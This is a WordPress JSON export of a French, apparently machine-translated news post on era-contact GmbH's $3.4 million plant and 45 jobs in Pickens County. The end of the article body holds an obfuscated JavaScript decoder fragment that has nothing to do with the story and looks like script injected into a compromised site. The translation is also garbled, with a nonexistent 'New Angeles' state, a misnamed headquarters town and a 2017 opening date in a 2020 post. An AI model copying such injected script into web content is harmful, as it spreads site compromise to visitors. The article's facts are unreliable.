{"id":7007,"date":"2020-10-28T14:32:30","date_gmt":"2020-10-28T14:32:30","guid":{"rendered":"http:\/\/alliancepickens.com\/2020\/10\/28\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/"},"modified":"2021-07-21T18:27:17","modified_gmt":"2021-07-21T18:27:17","slug":"une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m","status":"publish","type":"post","link":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/","title":{"rendered":"Une entreprise allemande apporte de nouveaux emplois, un investissement de 3 M$"},"content":{"rendered":"<p>Par Jason Evans<br \/>\nReporter du personnel<br \/>\njevans@thepccourier.com<br \/>\nCOMT\u00c9 &#8211; Un nouveau voisin se d\u00e9place dans le \u00ab&nbsp;quartier de classe mondiale&nbsp;\u00bb qui est le Pickens County Commerce Park.<br \/>\nLa soci\u00e9t\u00e9, era-contact GmbH, un leader mondial du march\u00e9 des couplages ferroviaires \u00e9lectriques, a annonc\u00e9 la semaine derni\u00e8re qu\u2019elle va localiser son si\u00e8ge manufacturier nord-am\u00e9ricain dans le comt\u00e9 de Pickens.<br \/>\nL\u2019investissement de 3,4 millions de dollars devrait cr\u00e9er 45 nouveaux emplois dans le comt\u00e9 de Pickens, a d\u00e9clar\u00e9 mercredi matin jochen Kurz, directeur g\u00e9n\u00e9ral des \u00c9tats-Unis.<br \/>\nLes responsables de la soci\u00e9t\u00e9 ont visit\u00e9 le Pickens County Commerce Park plus t\u00f4t cette ann\u00e9e, at-il dit.<br \/>\n\u00ab nous avons vu les voisins, nous avons vu la construction en cours ici et nous avons \u00e9t\u00e9 absolument impressionn\u00e9s \u00bb, a d\u00e9clar\u00e9 Kurz. \u00ab&nbsp;C\u2019\u00e9tait le coup de foudre.&nbsp;\u00bb<br \/>\nCette visite a conduit \u00e0 un accord de poign\u00e9e de main entre le directeur d\u2019Alliance Pickens Ray Farley et le fondateur de l\u2019entreprise Erich Aichele.<br \/>\nJason Evans\/Courrier<br \/>\nAlliances Pickens directeur ex\u00e9cutif Ray Farley a d\u00e9clar\u00e9 era-contact sera le plus r\u00e9cent r\u00e9sident dans le \u00ab&nbsp;quartier de classe mondiale&nbsp;\u00bb qui est le Pickens County Commerce Park<br \/>\n\u00ab e n\u2019est pas normal dans notre affaire \u00bb, a d\u00e9clar\u00e9 Kurz.<br \/>\nFarley \u00e9tait d\u2019accord. Il a dit apr\u00e8s les fonctionnaires de l\u2019entreprise \u00ab&nbsp;vraiment, vraiment bonne visite de deux jours&nbsp;\u00bb dans la r\u00e9gion, y compris des r\u00e9unions avec les fonctionnaires du comt\u00e9 et les fonctionnaires avec le Pickens County Career and Technology Center, Aichele lui a dit qu\u2019il \u00e9tait pr\u00eat \u00e0 signer des contrats alors et l\u00e0.<br \/>\nFarley a dit qu\u2019il devait dire \u00e0 Aichele qu\u2019il y avait des cerceaux \u00e0 passer par en premier, y compris trois lectures d\u2019ordonnances concernant les incitations. Mais les deux hommes se sont serr\u00e9 la main, acceptant de retourner \u00e0 leurs patrons &#8211; Pickens County Council et Frau Aichele, respectivement.<br \/>\n\u00ab Out cela \u00e0 partir d\u2019une poign\u00e9e de main, dit Farley. \u00ab Une fois que nous avons fait la poign\u00e9e de main, le vrai travail a commenc\u00e9. \u00bb<br \/>\n\u00ab&nbsp;Maintenant, nous sommes de retour ici dans le comt\u00e9 de Pickens pour signer les contrats&nbsp;\u00bb, a d\u00e9clar\u00e9 Kurz.<br \/>\nL\u2019installation du comt\u00e9 de Pickens devrait \u00eatre op\u00e9rationnelle en 2017.<br \/>\nKurz a donn\u00e9 un bref aper\u00e7u de l\u2019\u00e8re-contact et de sa m\u00e8re, le groupe Aichele.<br \/>\nL\u2019entreprise emploie actuellement 720 personnes sur huit sites sur quatre continents. Les sites comprennent l\u2019Allemagne, la Chine, la Turquie et la Tunisie. L\u2019entreprise poss\u00e8de une petite usine de vente \u00e0 Hauppauge, dans l\u2019\u00c9tat de New Angeles, mais toutes les activit\u00e9s nord-am\u00e9ricaines seront situ\u00e9es dans le comt\u00e9 de Pickens.<br \/>\n\u00ab L\u2019entreprise est en croissance \u00bb, a d\u00e9clar\u00e9 M. Kurz.<br \/>\nS\u2019installer dans l\u2019\u00c9tat de Caroline du Sud permettra \u00e0 l\u2019entreprise de mieux servir ses clients, dont BMW et Siemens.<br \/>\n\u00ab Nous sommes orient\u00e9s vers le client \u00bb, a d\u00e9clar\u00e9 M. Kurz.<br \/>\nLe travail du Pickens County Career and Technology Center va de pair avec les philosophies de l\u2019entreprise, combinant la th\u00e9orie avec les meilleures pratiques.<br \/>\n\u00ab C\u2019est quelque chose qui nous a beaucoup impressionn\u00e9s \u00bb, a d\u00e9clar\u00e9 M. Kurz. \u00ab Nous avons l\u2019intention d\u2019amener les jeunes dans notre \u00e9tablissement pour les \u00e9duquer sur les meilleures pratiques, les questions pratiques et les choses th\u00e9oriques qu\u2019ils ont au centre technologique. C\u2019est la prochaine \u00e9tape. C\u2019est tr\u00e8s important pour nous.<br \/>\nFarley a d\u00e9clar\u00e9 que la soci\u00e9t\u00e9 se joindra au quartier du parc de commerce de leaders dans leur domaine &#8211; y compris Adidas, TaylorMade, Reliable Automatic Sprinkler Co. et plus encore.<br \/>\nAvant l\u2019annonce, les membres du conseil du comt\u00e9 de Pickens ont tenu une r\u00e9union sp\u00e9ciale o\u00f9 ils ont adopt\u00e9 quelques mesures incitatives pour l\u2019entreprise, y compris un accord de frais en lieu et place de l\u2019imp\u00f4t.<br \/>\n\u00ab Maintenant, pour la partie amusante \u00bb, a d\u00e9clar\u00e9 la pr\u00e9sidente du conseil du comt\u00e9, Jennifer Willis, alors qu\u2019elle ajournait la r\u00e9union. Avec cela, le voile a \u00e9t\u00e9 lev\u00e9 sur le d\u00e9veloppement \u00e9conomique pr\u00e9c\u00e9demment connu seulement sous le nom de \u00ab&nbsp;Projet Big Apple.&nbsp;\u00bb<br \/>\n\u00ab Les entreprises les plus prosp\u00e8res sont celles qui s\u2019adaptent, innovent et ajoutent de la valeur \u00e0 leurs clients \u00bb, a d\u00e9clar\u00e9 M. Willis. \u00ab&nbsp;era-contact GmbH est une entreprise de fabrication internationale, \u00e0 la fine pointe de la technologie.&nbsp;\u00bb<br \/>\nLa soci\u00e9t\u00e9 a son si\u00e8ge social \u00e0 Bretton, en Allemagne, et fabrique des produits pour la transmission de signaux, de donn\u00e9es et de puissance dans de petits espaces. Ces applications sont utilis\u00e9es dans les m\u00e9tros, le rail et l\u2019automobile.<br \/>\n\u00ab&nbsp;era-contact GmbH est un leader mondial dans un r\u00e9seau \u00e9lectrique et les couplages de m\u00e9tro,&nbsp;\u00bb Willis a dit. \u00ab ls ont gagn\u00e9 cette position sur le march\u00e9 avec laser-comme l\u2019accent sur leur produit, leurs clients et leurs objectifs. Ce leader mondial aurait pu aller n\u2019importe o\u00f9, et pourtant ils ont choisi le comt\u00e9 de Pickens. Pourquoi? Parce que le conseil du comt\u00e9 de Pickens comprend les affaires.<br \/>\nFarley \u00e9tait d\u2019accord.<br \/>\n\u00ab Le conseil du comt\u00e9 a travaill\u00e9 avec beaucoup d\u2019acharnement pour nous amener l\u00e0 o\u00f9 nous en sommes aujourd\u2019hui \u00bb, a-t-il dit.<br \/>\nLorsque les entreprises r\u00e9ussissent et se d\u00e9veloppent, \u00ab chacun de nos citoyens en profite directement et indirectement \u00bb, a d\u00e9clar\u00e9 M. Willis.<br \/>\nLa structure initiale sera une installation de 38 000 pieds carr\u00e9s, avec de la place pour atteindre 90 000 pieds carr\u00e9s. L\u2019information sur les demandes d\u2019emploi sera disponible \u00e0 mesure que la construction de l\u2019usine de fabrication sera termin\u00e9e.<br \/>\nAichele a remerci\u00e9 tout le monde pour leur soutien et a dit qu\u2019il esp\u00e9rait qu\u2019ils pourraient avoir une c\u00e9r\u00e9monie d\u2019ouverture dans le courant de l\u2019ann\u00e9e prochaine.<br \/>\nApr\u00e8s l\u2019annonce, les participants ont appr\u00e9ci\u00e9 g\u00e2teau en l\u2019honneur de l\u2019anniversaire r\u00e9cent de Frau Aichele.<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Par Jason Evans Reporter du personnel jevans@thepccourier.com COMT\u00c9 &#8211; Un nouveau voisin se d\u00e9place dans le \u00ab&nbsp;quartier de classe mondiale&nbsp;\u00bb qui est le Pickens County Commerce Park. La soci\u00e9t\u00e9, era-contact GmbH, un leader mondial du march\u00e9 des couplages ferroviaires \u00e9lectriques, a annonc\u00e9 la semaine derni\u00e8re qu\u2019elle va localiser son si\u00e8ge manufacturier nord-am\u00e9ricain dans le comt\u00e9&hellip;<\/p>\n","protected":false},"author":8,"featured_media":5269,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[55],"tags":[],"class_list":["post-7007","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-fr","category-55","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Une entreprise allemande apporte de nouveaux emplois, un investissement de 3 M$ - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Une entreprise allemande apporte de nouveaux emplois, un investissement de 3 M$ - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"Par Jason Evans Reporter du personnel jevans@thepccourier.com COMT\u00c9 &#8211; Un nouveau voisin se d\u00e9place dans le \u00ab&nbsp;quartier de classe mondiale&nbsp;\u00bb qui est le Pickens County Commerce Park. La soci\u00e9t\u00e9, era-contact GmbH, un leader mondial du march\u00e9 des couplages ferroviaires \u00e9lectriques, a annonc\u00e9 la semaine derni\u00e8re qu\u2019elle va localiser son si\u00e8ge manufacturier nord-am\u00e9ricain dans le comt\u00e9&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-28T14:32:30+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-21T18:27:17+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png\" \/>\n\t<meta property=\"og:image:width\" content=\"98\" \/>\n\t<meta property=\"og:image:height\" content=\"80\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"AP Transfer\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"AP Transfer\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/\"},\"author\":{\"name\":\"AP Transfer\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"headline\":\"Une entreprise allemande apporte de nouveaux emplois, un investissement de 3 M$\",\"datePublished\":\"2020-10-28T14:32:30+00:00\",\"dateModified\":\"2021-07-21T18:27:17+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/\"},\"wordCount\":1070,\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/eraContactlogo98x80.png\",\"articleSection\":[\"News\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/\",\"name\":\"Une entreprise allemande apporte de nouveaux emplois, un investissement de 3 M$ - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/eraContactlogo98x80.png\",\"datePublished\":\"2020-10-28T14:32:30+00:00\",\"dateModified\":\"2021-07-21T18:27:17+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/#primaryimage\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/eraContactlogo98x80.png\",\"contentUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/eraContactlogo98x80.png\",\"width\":98,\"height\":80,\"caption\":\"ERA Contact Logo (Small)\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Une entreprise allemande apporte de nouveaux emplois, un investissement de 3 M$\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\",\"name\":\"AP Transfer\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"caption\":\"AP Transfer\"},\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/author\\\/aptransfer\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Une entreprise allemande apporte de nouveaux emplois, un investissement de 3 M$ - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/","og_locale":"fr_FR","og_type":"article","og_title":"Une entreprise allemande apporte de nouveaux emplois, un investissement de 3 M$ - Alliance Pickens","og_description":"Par Jason Evans Reporter du personnel jevans@thepccourier.com COMT\u00c9 &#8211; Un nouveau voisin se d\u00e9place dans le \u00ab&nbsp;quartier de classe mondiale&nbsp;\u00bb qui est le Pickens County Commerce Park. La soci\u00e9t\u00e9, era-contact GmbH, un leader mondial du march\u00e9 des couplages ferroviaires \u00e9lectriques, a annonc\u00e9 la semaine derni\u00e8re qu\u2019elle va localiser son si\u00e8ge manufacturier nord-am\u00e9ricain dans le comt\u00e9&hellip;","og_url":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/","og_site_name":"Alliance Pickens","article_published_time":"2020-10-28T14:32:30+00:00","article_modified_time":"2021-07-21T18:27:17+00:00","og_image":[{"width":98,"height":80,"url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png","type":"image\/png"}],"author":"AP Transfer","twitter_card":"summary_large_image","twitter_misc":{"Written by":"AP Transfer","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/#article","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/"},"author":{"name":"AP Transfer","@id":"https:\/\/alliancepickens.com\/fr\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"headline":"Une entreprise allemande apporte de nouveaux emplois, un investissement de 3 M$","datePublished":"2020-10-28T14:32:30+00:00","dateModified":"2021-07-21T18:27:17+00:00","mainEntityOfPage":{"@id":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/"},"wordCount":1070,"image":{"@id":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png","articleSection":["News"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/","url":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/","name":"Une entreprise allemande apporte de nouveaux emplois, un investissement de 3 M$ - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png","datePublished":"2020-10-28T14:32:30+00:00","dateModified":"2021-07-21T18:27:17+00:00","author":{"@id":"https:\/\/alliancepickens.com\/fr\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"breadcrumb":{"@id":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/#primaryimage","url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png","contentUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/eraContactlogo98x80.png","width":98,"height":80,"caption":"ERA Contact Logo (Small)"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/fr\/une-entreprise-allemande-apporte-de-nouveaux-emplois-un-investissement-de-3-m\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Une entreprise allemande apporte de nouveaux emplois, un investissement de 3 M$"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/fr\/#website","url":"https:\/\/alliancepickens.com\/fr\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/alliancepickens.com\/fr\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01","name":"AP Transfer","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","caption":"AP Transfer"},"url":"https:\/\/alliancepickens.com\/fr\/author\/aptransfer\/"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/posts\/7007","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/comments?post=7007"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/posts\/7007\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media\/5269"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media?parent=7007"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/categories?post=7007"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/tags?post=7007"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}